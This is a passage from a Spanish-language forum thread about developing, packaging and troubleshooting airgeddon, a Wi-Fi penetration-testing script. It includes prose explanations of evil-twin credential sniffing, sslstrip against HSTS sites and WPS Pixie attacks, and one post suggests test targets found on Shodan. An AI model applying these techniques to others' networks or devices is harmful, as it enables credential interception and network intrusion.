El motivo de no poner ccze en los checks iniciales, es porque está tratado como una "internal tool" ... y no como opcional. Las opcionales son necesarias para realizar algunos ataques... y las internal tools no son necesarias, pero si están se usan... no se muestran chequeos pero airgeddon internamente mira si están estas internal tools, y si están son usadas, y si no no... pero no son bloqueantes. No voy a impedir que se pueda realizar un ataque por no tener ccze que es una chorradilla de colorización... y es que lo tengo así dividido. Por si quieres echar un ojo a otras posibles internal tools, aunque creo que Wifislax lleva todas de serie excepto el ccze:

Essential tools:
https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Essential%20Tools

Optional tools:
https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Optional%20Tools

Internal tools:
https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Internal%20Tools

ccze instalado con tus instrucciones, gracias!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 22:45 (Domingo)
en el repo que te deje de kali , unos posts atras ,estan los orig 2.7 sources y los debian , en el de debian estan los patches ajustados a la 2.7

solo me queda la duda de hashcat , he visto esto

https://github.com/sa7mon/wpe-parse
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-02-2019, 23:31 (Domingo)
hostapd-wpe-2.7
https://mega.nz/#!DhZiHSRB!VMKrJDAZ9ihbsp0SfmA1SVwDxhDkc4lPkASb-xFFSYQ

mira a ver lo de hashcat
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-02-2019, 08:19 (Lunes)
Fucking yeah, ahora sí que sí!!!!! que bueno!

(https://i.ibb.co/P9vx32v/wifislax.png) (https://ibb.co/cCSJMWS)

Ahora ya sí que airgeddon es capaz de sacar los dos ficheros, para john y hashcat. Funcionando!!!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-02-2019, 12:41 (Lunes)
Bueno , pues si lo das por bueno , lo pongo en iso , los dos , el hostapd-wpe-2.7  y el airgeddon reempaquetado.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-02-2019, 12:49 (Lunes)
Sí, están perfect! y no te olvides de incluir ccze también porfa. Graciaaaaaaaaaaaaaaaaaas.  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: VER en 18-02-2019, 13:57 (Lunes)
Para cuando lo a iso?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 18-02-2019, 23:59 (Lunes)
No se si actualizar tambien hostapd del 2.6 al 2.7 , ya tengo el slackbuild modificado ...  ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-02-2019, 14:48 (Martes)
Bueno, pues ya que estamos... ¿por qué no? buena idea. Si quieres pásame el módulo cuando lo tengas y lo testeo, para evitar sorpresas.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 19-02-2019, 19:41 (Martes)
Hola de nuevo , me gustaria hacer una pregunta a v1s1t0r sobre airgeddon.
Lo hago correr y todo perfecto pero en ataques con riff o sslstrip parece que estos no actuan , se pone en marcha pero no aparece nada mas en la pantalla.
Decir que los actualice y no se si en la version mas actual airgeddon los soporta ya que parece que el pc se queda pillado y va muy lento.
Yo trabajo con wifislax en HDD en un core2 duo con 2gb de ram.
Podria ser que necesito algo mas ??
O es que me gusta trastear demasiado?? y actualizando cometi un error??
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 19-02-2019, 20:30 (Martes)
Hola, supongo que al decir riff te refieres a BeEF... pero no entiendo bien lo de que "no aparece nada en la pantalla". ¿No se te abren las ventanas del AP, el DHCP, el DoS, la ventana de control etc ??? ¿O te refieres a que no pillas ninguna contraseña en plano en la ventana del sniffer? en el ataque de BeEF sería en la ventana de Bettercap, y en el ataque normal con sslstrip sería en la ventana de ettercap (sin b).

Además de montar el ataque, tiene que haber víctimas que se conecten a la red... ¿te aparecen clientes en la ventana de control? si no conecta nadie no vas a pillar nada. Lo mejor es que lo pruebes tú mismo conectándote a la red falsa con un móvil o similar para probar... y luego pues tendrás que navegar por internet para comenzar a hacer sniffing de cosas... Todo lo que vaya en plano lo vas a ver sin problemas (un login de una web que no tenga https, una conexión ftp, etc... Ejemplos para probar (lo primero que pillé por shodan para probar): ftp://77.55.27.56 o bien http://login.ebiquity.com/

Entrando desde la víctima en esas direcciones que indico al intentar hacer login deberías capturar sin problemas las contraseñas en texto plano ya que no van cifradas. No importa que no sepas la contraseña del sitio, con hacer un intento fallido poniendo cualquier credencial la prueba de concepto es que veas esas credenciales del intento fallido. Luego para el sslstrip ya no es tan fácil. Un sitio que probé el otro día donde funcionaba bien hacer el sslstrip es http://www.trello.com . Como habrás visto, lo pongo sin https aunque sea un sitio que tiene cabecera HSTS y que al entrar te redirige automáticamente a la página con https... pero la "gracia" del asunto está en que si la víctima no escribe correctamente https://www.trello.com y pone simplemente "trello.com", pues hay una primera petición en plano que es de la que se sirve sslstrip para meterse en medio y hacer su magia mostrando en plano la página a la víctima. Ojo! que si entras una vez a la web antes de la prueba, tu navegador cacheará por la cabecera HSTS que esa web usa ssl y luego no funcionará el sslstrip, así que tras cada prueba has de borrar datos de navegación, cookies y ficheros temporales... solo así te aseguras de que la prueba es correcta.

Ayudaría que describieras más tu problema. Versiones que utilizas, de airgeddon, de Wifislax, de bettercap, qué tarjeta wifi tienes, que chipset... que haces, que ocurre, que mensajes tienes, etc... si no, difícilmente  ;) solo te puedo decir que a todo el mundo le funciona bien, y no hay nada que se quede pillado. Tu pc es un poco flojo ... pero aun así, con un Linux instalado en nativo (sin usar máquinas virtuales ni nada) debería bastar para poder utilizar esto.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 20-02-2019, 01:24 (Miércoles)
saludos
he querido probarlo por encima y parace que betercap no es version de airgedon
dejo capturas
(https://i.postimg.cc/VNX4nChX/instant-nea1.png)
dependencias marca bien

(https://i.postimg.cc/fbv21dvD/instant-nea2.png)
ultima version de airgedon

(https://i.postimg.cc/X7GV3jhT/instant-nea3.png)
pero no deja continuar si no tengo version de betercap
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-02-2019, 07:26 (Miércoles)
El mensaje es muy claro no te parece? el último bettercap soportado (por ahora) es bettercap 1.6.2 y tú tienes uno más nuevo. Desde que la gente de bettercap sacó el bettercap 2.x , reescribieron completamente el código, incluso lo cambiaron de lenguaje. Antes estaba programado en ruby y ahora está en Go. Los cambios son tan brutales que es absolutamente incompatible. Antes se lanzaban parámetros en la línea de comandos y ahora se tendrían que crear unos ficheros de configuración y utilizarlos... de hecho, ahora mismo andamos investigando esto. Tenemos un branch en el proyecto específico para intentar hacer funcionar bettercap 2.x lo que pasa es que no está siendo nada fácil por varias cosas.

Parece que a los de bettercap no les interesa mucho ser integrados en ninguna parte, eso para empezar... y luego que el nuevo software está lleno de bugs. Sí, funciona (a mi parecer) bastante peor que el antiguo bettercap 1.x . Incluso descubrimos un bug que hemos notificado hace poco: https://github.com/bettercap/bettercap/issues/428

No obstante, como indica en el enlace que te aparece en el mensaje, en el Wiki tienes info de como hacer un downgrade. Lo que pasa es que solo está enfocado a Parrot y Kali. Para hacer un downgrade de bettercap a la versión 1.x en Wifislax no sabría decirte ahora mismo como sería. Tendrías que tener el módulo, desinstalar el bettercap 2.x y luego instalar el 1.x ... pero ya os digo que si en Wifislax se ha actualizado la versión a la 2.x yo no puedo hacer nada. No se si USUARIONUEVO querrá hacer downgrade para todo el mundo a la versión 1.x . Creo que antes de airgeddon bettercap ni estaba, y que se incluyó para poder hacer este ataque. Si lo que se sigue pretendiendo es que se pueda hacer el ataque hay dos opciones, o downgradearlo a la versión 1.x que funciona infinitamente mejor, o esperar a que consigamos integrar bettercap 2.x (aunque ya os anticipo que tiene mala pinta la cosa...). La otra opción sería que se quedase el 2.x por si conseguimos integrar la nueva versión que se ponga por aquí el módulo de la 1.x con unas pequeñas instrucciones sobre como quitar el 2.x e instalarlo para que el que quiera se lo pueda hacer mientras seguimos intentando integrarlo.

P.D. Estoy buscando ayuda sobre este tema (que no tiene nada que ver con bettercap), abrí un issue en github: https://github.com/v1s1t0r1sh3r3/airgeddon/issues/224
Título: Re:Script multiuso en bash, airgeddon
Publicado por: dynyly en 21-02-2019, 00:34 (Jueves)
saludos lamento ofrecerte pocos datos no entiendo mucho yo de eso he probado con una tablet con android 4.1
y telefofono pocophone con android 9
enseño capturas

con la tablet android 4.1
(https://i.postimg.cc/z3YJTzvx/instant-nea1.png)


con telefono movil android 9
(https://i.postimg.cc/Dy1GHmry/instant-nea3.png)

he hice pequeño diccionario y lo pase
(https://i.postimg.cc/8PTMBVY0/instant-nea4.png)

ha sido probado por encima forzandolo sin conexion a internet tenia una antena
no se si te valdra de algo es lo poco que hecho
lo que he notado es con android 4 coge bien las dos claves
con android 9 solo la de usuario
para clave de red se ha de pasar dicc
Thanks por el trabajo
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 21-02-2019, 20:55 (Jueves)
Gracias por tu interés, pero hasta que no implemente dumb-down vas a capturar hashes siempre... no importa que versión de Android tengas. El asunto es que si consigo implementarlo entonces sí que importará el cliente que conecte y se comportará de una forma distinta... pero de momento no hay nada que hacer. De momento la única posibilidad de capturar una contraseña en plano es "hacerlo mal" en el cliente. Es decir, que cuando vas a conectar además de poner el usuario y contraseña, cambiar los parámetros de autenticación de la conexión y seleccionar TTLS y en la segunda fase PAP. Así sí que verás que funciona lo de capturar credenciales en plano... pero bueno, que eso no hay que probarlo porque está más que probado. Lo que necesito es saber como se implementa Dumb-down... ya tengo una persona que sabe de esto y que parece que está dispuesta a ayudarme, así que igual pronto se podría implementar, ya veremos.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 23-02-2019, 05:49 (Sábado)
dejo el hostapd-2.7 compilado usando la misma config que en el 2.6
https://mega.nz/#!C1YzUCiI!s7Y4qRSPkbq1iDLF4hjHqwcXQrMC9-anHMS4wirk_FA
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 23-02-2019, 08:06 (Sábado)
Descargado, desintalé el anterior, instalé y probé este paquete. Todo ok.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 23-02-2019, 19:56 (Sábado)
Descargado, desintalé el anterior, instalé y probé este paquete. Todo ok.

gracias , la config es la misma , imagino que sera mayormente una version para parchear todos los CVE , que habia que parchear en la version 2.6.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2019, 23:25 (Lunes)
Ya está a punto la v9.10 con integración de nftables, mdk3 reemplazado por mdk4 y algún fix... saldrá en muy breve.

Por otra parte, tengo otro branch en el que estamos trabajando para poner como alternativa lanzar airgeddon usando tmux en lugar de xterm. Será una opción más del nuevo sistema de opciones configurables del fichero .airgeddonrc . Lo que pasa es que va para largo porque es una movida que te cagas. La ventaja que esto tendrá para usuarios avanzados que quieran activarlo (porque xterm seguirá siendo la opción por defecto), es que podrán ejecutar airgeddon en un linux o server sin servidor X. A ver si lo conseguimos porque ya digo que no está siendo nada fácil, aunque la cosa parece que va para adelante.

No obstante, he visto que tmux no viene instalado por defecto en Wifislax... es un paquete pequeño, ¿se podría añadir? gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 25-03-2019, 23:29 (Lunes)
Ya está a punto la v9.10 con integración de nftables, mdk3 reemplazado por mdk4 y algún fix... saldrá en muy breve.

Por otra parte, tengo otro branch en el que estamos trabajando para poner como alternativa lanzar airgeddon usando tmux en lugar de xterm. Será una opción más del nuevo sistema de opciones configurables del fichero .airgeddonrc . Lo que pasa es que va para largo porque es una movida que te cagas. La ventaja que esto tendrá para usuarios avanzados que quieran activarlo (porque xterm seguirá siendo la opción por defecto), es que podrán ejecutar airgeddon en un linux o server sin servidor X. A ver si lo conseguimos porque ya digo que no está siendo nada fácil, aunque la cosa parece que va para adelante.

No obstante, he visto que tmux no viene instalado por defecto en Wifislax... es un paquete pequeño, ¿se podría añadir? gracias.

ok tmux

si lo necesitas para probar, puedes instalarlo con

Código: [Seleccionar]
slackpkg update
slackpkg install tmux
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-03-2019, 23:31 (Lunes)
Ya me lo había instalado... pero joder q rapidez! así da gusto!!!  >:( gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 30-03-2019, 13:08 (Sábado)
Vale, acabamos de sacar la version 9.10 con lo q comenté... mdk3 ha sido reemplazado por mdk4 y ahora también tiene soporte para nftables.

Estamos trabajando duro en la 9.20 que incluirá soporte tmux para evitar necesitar servidor X. En algunos entornos puede ser interesante.

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 01-04-2019, 20:52 (Lunes)
Buenas tardes (bueno, desde donde estoy, ahora es la tarde. ;D ).

Estoy estudiando esto de pentesting y estoy ahora mismo probando el script. Lo primero que note es que esta de muerto de tan bueno. Muchas gracias a todos por los esfurzos en hacer un script tan bueno, de verdad, en especial a v1s1t0r.

Bueno, dadas las congratulaciones, vamos a lo que interessa. El script se ha actualizado aqui em my wifislax para la version 9.10 hoy, y al principio me parecio que seguia lo mismo, pero mas rapido, pero luego me depare com dos mensajes que no tengo la menor idea de lo que passa, porque en la version anterior que usaba yo (la 9.02 creo), no salian.
Una ayudita, si no es pedir mucho, puesto que soy el novato aqui y no tengo ni p*netera idea de lo que passa, porfa?

PS: He intentado poner dos prints aqui pero no logre, entonces os dejo con el link de donde los he postado.

https://imgur.com/a/UvW77S4
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-04-2019, 21:37 (Lunes)
hhnmmm.... añade a tu fichero .airgeddonrc (que estará en la misma carpeta que el script) estas líneas:

#Enabled true / Disabled false - Force to use iptables instead of nftables (it has no effect if nftables are not present) - Default value false
AIRGEDDON_FORCE_IPTABLES=true

Todo esto es porque la nueva versión tiene esta opción nueva en el fichero .airgeddonrc y tu fichero no tiene dicho cambio. airgeddon no descarga ese fichero por miedo a "pisar" tus preferencias configuradas. No obstante, solo es un "warning". Te avisa de que esa opción no la tienes. Si la añades a mano como te indico pues arreglado. Además, para solucionar el segundo problema que tienes, poniendo esta opción a true se arreglaría porque forzamos a usar iptables en lugar de nftables. Parece que tu sistema tiene nftables y por eso airgeddon las está usando pero por alguna causa que desde aquí me es imposible saber, te está dando algún tipo de error.

A mi me funcionó perfectamente en mis pruebas con Wifislax, no obstante para eso añadí esta opción. Por si hubiera cualquier problema poder forzar que utilice iptables y que siga funcionando como siempre por si hubiera algo por ahí en el sistema de alguien que no estuviera muy fino.

Resumiendo, que si añades esas lineas al fichero .airgeddonrc se te solucionará todo. Saludos.

Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 01-04-2019, 21:42 (Lunes)
Hostias, pero que rapido has respondido!  :D
Muchas gracias, por el help. Lo voy a probar y luego doy noticias.


EDIT1: Bueno, a ver. Solo sacame una duda. Airgeddon esta instalado en /usr/share/airgeddon/, verdad? Porque si es asi, aki no hay ningun fichero .airgeddonrc, o es que estoy buscando-lo en el sitio equivocado?
Paciencia, porfa, que lo estoy volviendo a pillar el tranquillo ahora. Hacian anos que no me las apanaba con linux.  :-\

EDIT2: Vale, venga, lo he encontrao. JAJAJAJAJA
Es que esta oculto (por el "." en el pricipio del fichero, no me acordaba de estos detalles en linux), y no me acuerdo como hacer con que aparezca, pero ya me las arreglo aki.  >:D

EDIT3: MUY BIEEEN!! Arreglao! Ahora me da la impression que incluso el script va mas rapido. jejeje
Bueeeeno, ahora me sale un otro error aki cuando intento utilizar el Evil Twin, pero creo que no tendra relacion con el script. Sera algo con mi adaptador de wifi. Estoy intentando utilizar un Airlive wl1600usb-2 (Realtek rtl8187l), porque tiene un mejor alcance que el wifi de mi portatil, pero cuando inicio el Evil Twin (estoy probando con la opcion 9, con solo un adaptador de wifi), me salen estos mensajes en el terminal del AP:

https://imgur.com/Kia9B0G

Bueno, todavia no he pillao cual es el problema, pero creo que sera algo con el adaptador, no?

Otra vez no tengo mas es que agradecer a todos por el fantastico trabajo que haceis con el wifislax. Gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-04-2019, 23:07 (Lunes)
Si, eso ya parece externo a airgeddon... prueba a ejecutar antes de entrar en airgeddon:

service stop networkmanager

No se si te funcionará, imagino que no, pero por descartarlo. Si no te funciona te recomiendo que uses otro adaptador.

Por otra parte, estoy ya pensando en un fix para que salga el warning ese cuando se actualiza el script. Si no lo hago, cada vez que añada una opción nueva en el fichero .airgeddonrc saldrá un warning del mismo tipo... así que algo me inventaré. Igual hago un hotfix en una versión 9.11 con alguna magia para evitar esto.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 02-04-2019, 00:13 (Martes)
Si, eso ya parece externo a airgeddon... prueba a ejecutar antes de entrar en airgeddon:

service stop networkmanager

No se si te funcionará, imagino que no, pero por descartarlo. Si no te funciona te recomiendo que uses otro adaptador.

Por otra parte, estoy ya pensando en un fix para que salga el warning ese cuando se actualiza el script. Si no lo hago, cada vez que añada una opción nueva en el fichero .airgeddonrc saldrá un warning del mismo tipo... así que algo me inventaré. Igual hago un hotfix en una versión 9.11 con alguna magia para evitar esto.

Saludos.

Gracias por el aporte con lo del networkmanager, pero no ha funcionao. Estoy mirandolo todo bien con un poco mas de tiempo y calma ahora que ya he cerrado mi taller, y me dao cuenta que el AP no lo esta cargando los drivers de la Realtek rtl8187l, pero si cargando los drivers de mi tarjeta interna de la portatil (los nl80211) y no me las apanho para ver que cojines le pasa a esto. He probado reiniciar el portatil, por si las moscas, pero sigue lo mismo...

Voy a hechar un vistazo por internet a ver si a mas alguien le passa o paso esto, y se lo arreglo o no.

Si por casualidad te sale alguna idea a respeto, si la puedes compartir te lo agradezco muchissimo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 02-04-2019, 17:23 (Martes)
A mi me sale el mensaje al iniciar airgeddon y intento buscar el archivo .airgeddonrc. pero no soy capaz de encontrarlo .
Tengo wifislax instalado en hdd. Y yo no lo veo. Alguna ayuda??
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-04-2019, 18:41 (Martes)
Vas en la consola a /usr/share/airgeddon con un comando cd y luego allí con ls -la ves todos los archivos incluso los ocultos. Lo editas con vi o con nano y listo.  ;)
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 02-04-2019, 20:02 (Martes)
A ver v1s1tor me vas a perdonar pero o soy bastante inutil o no lo encuentro.
Abro terminal y pongo cd /usr/share/airgeddon y no se encuentra la orden.
Pongo cd /usr y entro solo hasta usr , encuentro /share pero no contiene airgeddon.
Pongo dir share y airgeddon no esta en la lista.
Donde lo habre puesto,jajajaja
Gracias por tu ayuda pero no soy capaz.

Intente una busqueda de archivos o carpetas y airgeddon esta desaparecido bro, pero tenerlo lo tengo y ejecuto bien
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 02-04-2019, 20:42 (Martes)
A ver v1s1tor me vas a perdonar pero o soy bastante inutil o no lo encuentro.
Abro terminal y pongo cd /usr/share/airgeddon y no se encuentra la orden.
Pongo cd /usr y entro solo hasta usr , encuentro /share pero no contiene airgeddon.
Pongo dir share y airgeddon no esta en la lista.
Donde lo habre puesto,jajajaja
Gracias por tu ayuda pero no soy capaz.

Intente una busqueda de archivos o carpetas y airgeddon esta desaparecido bro, pero tenerlo lo tengo y ejecuto bien

Mirad, ayer estuve con el mismo problema (por quedarme algunos anos sin usar linux), y lo solucione facil. Te explico:
- abres un Dolphin (el navegador de ficheros de KDE) y buscas la carpeta esta (/usr/share/airgeddon);
- cuando estes ahy, vas en el menu "View" del Dolphin y luego buscas la opcion "Show Hidden Files" y marcas la casilla;
- Hecho! Te vas a aparecer el fichero este como por passe de magia. jejejeje

Espero haber ayudao.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: conc@ en 02-04-2019, 21:03 (Martes)
Casi lo has clavado TJUndead me salio el archivo pero yo tengo airgeddon en /usr/bin/airgeddon

Solucionado, gracias maquinas
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 02-04-2019, 21:05 (Martes)
Casi lo has clavado TJUndead me salio el archivo pero yo tengo airgeddon en /usr/bin/airgeddon

Solucionado, gracias maquinas

Uy, es verdad. Me he equivocao de carpeta. lo siento. jejejeje
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-04-2019, 23:49 (Martes)
Vale es porque la ubicación de /usr/share/airgeddon es a partir de no se que versión de wifislax cuando lo empaquetó ya en la ubicación definitiva USUARIONUEVO. Si vienes de una versión más antigua estará en el otro sitio como indicáis. Bueno, me alegro de que esté solucionado. Como comentaba, haré algo para la próxima versión y cuando se os actualice esto ya no pasará más... la idea es que al descargarse una nueva versión se descargue el fichero .airgeddonrc también, pero a su vez, para no machacar y perder las opciones que el usuario pueda tener ahí configuradas pues lo que haré será que lea las opciones que tenga el user justo antes de bajar el fichero y tras bajar el nuevo cambiar el fichero nuevo con las opciones que hayamos leído antes. Así no perderá lo que tiene y a la vez si el fichero nuevo tiene alguna opción nueva pues también la tendrá y evitaremos esos warnings que no son más que el fruto de validaciones para que todo esté controlado y que si peta o no está algo pues te lo dice.

Saludos y gracias por el feedback.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-04-2019, 22:25 (Miércoles)
Puede alguien confirmar que BeEF está funcionando bien en la última versión de wifislax? porqu lo abro y llego al panel, pero no soy capaz de hacer login (ni siquiera usando airgeddon)... no hago login ni con beef/beef ni nada... y en el fichero de config por defecto de beef pone que esas son las creds... ¿le pasa a alguien mas? ¿lo puedes mirar cuando tengas un ratillo USUARIONUEVO? thanks!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: trasto90 en 05-04-2019, 20:19 (Viernes)
Se agradece la actualización. Siempre es una alegria encontrarte con una versión nueva.

Tengo un problemilla. Sigo con wifiskax 4.12 y no tengo mdk4. He buscado algo pero no consigo instalar.

Preferiria seguir con wifislax 4.12.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: trasto90 en 06-04-2019, 11:23 (Sábado)

Para @trasto90 ...

Garcias por las aclaraciones. Hasta ahora no ví que eran para mi las respuestas.
Muy bien explicado y respuesta extensa, todo aclarado. Así que muchas gracias.

Siento no haberme dado cuenta hasta ahora pero empezaba respondiendo a otro usuario y me despisté.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 12-04-2019, 22:28 (Viernes)
Buenas, acaba de salir airgeddon v9.11 que corrige el tema ese de que al actualizarse salgan warnings por opciones no existentes en el fichero de opciones... bueno a ver, la validación sigue existiendo por si tocando te cargas algo del fichero pero ahora cuando se actualiza también se baja dicho fichero para incorporar posibles nuevas opciones. Además te respeta las personalizaciones que tuvieras para que no pierdas los posibles cambios que tuvieras.

También incluye cambios para la compatibilidad con BeEF ya que parece ser que habían hecho algunos cambios en el fichero de configuración y en algunas versiones no funcionaba bien. Ahora airgeddon detecta la versión de BeEF y prepara el fichero con los cambios necesarios para todas sus versiones incluyendo la que sacarán en breve 0.4.7.2. A este respecto he de decir que creo que algo pasa con el BeEF de Wifislax... tengo que probarlo bien pero creo que la última vez que lo probé no funcionaba... pero independientemente de airgeddon... hablo de lanzar BeEF por sí solo. Ya lo confirmaré pero creo que el paquete de Wifislax puede que necesite algún retoque USUARIONUEVO .

He de decir que la futura versión v9.20 con soporte para tmux está ya muy avanzada. De hecho lo de tmux está terminado y en beta testing... si algún valiente se atreve ya sabe... que se descargue el branch "headless_tmux" del repo y que lo pruebe. Con este cambio se podría lanzar airgeddon en Linux que no tengan entorno gráfico. En el caso de Wifislax igual no es muy útil pues tiene unas X con KDE muy chulas, pero para ponerlo en alguna Raspberry Pi antigua o similar que va muy justa de recursos, puede venir muy bien ponerla en modo "headless" (sin entorno gráfico) y así poder lanzar la herramienta. La verdad es que ha sido un esfuerzo titánico... ha habido que reestructurar algunas cosas... pero creo que ha merecido la pena. Igual en un mes o así podréis disfrutar de esta versión.

Saludos terrícolas!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 24-04-2019, 18:25 (Miércoles)
Puede alguien confirmar que BeEF está funcionando bien en la última versión de wifislax? porqu lo abro y llego al panel, pero no soy capaz de hacer login (ni siquiera usando airgeddon)... no hago login ni con beef/beef ni nada... y en el fichero de config por defecto de beef pone que esas son las creds... ¿le pasa a alguien mas? ¿lo puedes mirar cuando tengas un ratillo USUARIONUEVO? thanks!

Lo he probao ahora y al menos para mi está todo funcionando perfectamente.

V1s1t0r, puedo hacerte un par de  requisiciónes/sugerências al script? Es lo siguiente, cuando por ejemplo utilizo la opción 8 (Ataque por WPS), si va todo bien el script lo graba todo en un fichero en /root/wps_captured_key-ABABABABABA.txt (bueno, algo asi, ya me entiendes). Hay alguna manera de direcionar el script pa que lo grave todo en otra carpeta en lugar de la ROOT? Y adenas de la información que ya graba (BSSID, canal, ESSID Y contraseña) seria possíble que lo grabara tambiém el PIN que el ataque pilla del WPS?

Me quedo en el aguardo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 24-04-2019, 22:34 (Miércoles)
Hola, cuando te dice que lo va a guardar en esa ruta si obtiene resultados (antes de lanzar el ataque), ahi en lugar de presionar enter y aceptar la ruta por defecto, puedes elegir la ruta que quieras. Puedes escribir una ruta a una carpeta o a un fichero y te lo guardará donde tu quieras... me parece que el mensaje lo dice bien claro: "Si se consigue la contraseña de la red wifi con el ataque WPS, hay que decidir donde guardarla. Escribe la ruta donde guardaremos el fichero o pulsa [Enter] para aceptar la propuesta por defecto".

Por otra parte, es cierto que el PIN no se guarda en el fichero de trofeo, solo la contraseña... esto igual se podría implementar... aunque en el Null PIN attack (que está implementado ya para la v9.20) habrá que dejarlo en blanco o algo así...

Gracias por la sugerencia. Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 25-04-2019, 03:21 (Jueves)
"Si se consigue la contraseña de la red wifi con el ataque WPS, hay que decidir donde guardarla. Escribe la ruta donde guardaremos el fichero o pulsa [Enter] para aceptar la propuesta por defecto".

Uy, pues es verdad. Es que yo estaba con el script en inglês por mi sistema que está en inglês, y por pereza de cambiarlo, pero ahora que lo has dicho he cambiao el lenguaje y me percaté de esto. Lo siento.   :-X ^-^

EDIT: Por casualidad la version de testeo 9.20 no estará disponible como packete .DEB? My maquina donde tengo el wifislax está estropeada, entonces estoy utilizando otra con el Parrot OS, que está basado en Debian... Me gustaria probarla a ver como está, y a ver si puedo hechar una mano en algo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 25-04-2019, 07:39 (Jueves)
La version 9.20 está ahora mismo en beta-testing en la rama dev del github. No está empaquetada como .deb pero puedes usarla simplemente haciendo un git clone de esa rama, es decir: "git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon" y luego entras a la carpeta con "cd airgeddon" y lo lanzas "bash airgeddon.sh".
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 25-04-2019, 17:10 (Jueves)
La version 9.20 está ahora mismo en beta-testing en la rama dev del github. No está empaquetada como .deb pero puedes usarla simplemente haciendo un git clone de esa rama, es decir: "git clone -b dev https://github.com/v1s1t0r1sh3r3/airgeddon" y luego entras a la carpeta con "cd airgeddon" y lo lanzas "bash airgeddon.sh".

Perfecto. Gracias, lo voy a probar.  >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: TJUndead en 06-05-2019, 17:02 (Lunes)
Buenos dias. A ver, la versión esta de testeo 9.20 está de maravilla, hasta ahora no he encontrado ningum problema, pero (si, hay un pero) hace tiempo ya que vengo me percatando de una cosa, y lo voy a comentar.
Es sobre los ataques a WPS. Me he dado cuenta de que, cuando utilizo los dos ataques con Pixie (las opciones 7 y 8, Pixie con Bully y Pixie con Reaver), si executo un ataque y logro conseguir el PIN, pero por el motivo que sea perco la señal, el script termina su execucion con el mensage "Password was not cracked: Maybe decause bad/low signal, or PCB activated on AP". Vale, hasta aki todo bien, pero en el caso de Bully, el grava la sessión en un fichero dentro de la carpeta /root/.bully/ababababababab.run, y por mi entendimiento, los mas logico es que cuando se inicie el ataque al mismo alvo, deveria recuperar la session y empezar desde donde has parado aprovechando el PIN, lo que se puede leer en el inicio del ataque, pero no lo ocurre. El Bully recupera la session, pero empieza desde cero, mismo ya teniendo el PIN adquirido en el ataque anterior, asi que al fin y al cabo, tengo que utilizar el Bully desde fuera del script para poder aprovechar el PIN.
Bueno, no logro entender porque hace esto, y ademas, cuando empieza el ataque, siempre dice que vas a utilizar un PIN generado de manera aleatória, pero al final siempre utiliza el mismo.
Ya cuanto al Pixie con Reaver, cuando logra adquirir el PIN, executa um par de comandos mas e ya, no hace nada mas, tampoco logra conseguir la contraseña, simplesmente para de funcionar, me dando un mensage de que ya puedo cerrar la ventana.
Ahora no se si esto ocurre solo conmigo, o si a alguiem mas le pasa, porque no he visto aqui en el foro nadie hablando al respeto, tampoco he entendido si esto tiene algo que ver con el script o si se trata de algun tipo de restrición del Bully y del Reaver. Por este motivo que he hecho la sugerência de que el script salvara tambiém el PIN, puesto que al final, en algunas situaciones, es de gran ayuda (esto sin contar que con el PIN, por general, mismo que cambien la contraseña, podemos conseguir la nueva sin mucho trabajo). Ademas de esto, creo que seria muy interessante que, si ocurre de conseguir el PIN, pero no logra Auditar la contraseña (la situación que he puesto al princípio), creo que deveria gravar algun tipo de fichero con esta información tambien, puesto que al fin y al cabo, tiene uso la información.
Bueno, espero que me tenga entendido. Tengo aki algunas prints de la pantalla, caso haga falta para demonstrar el problema.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
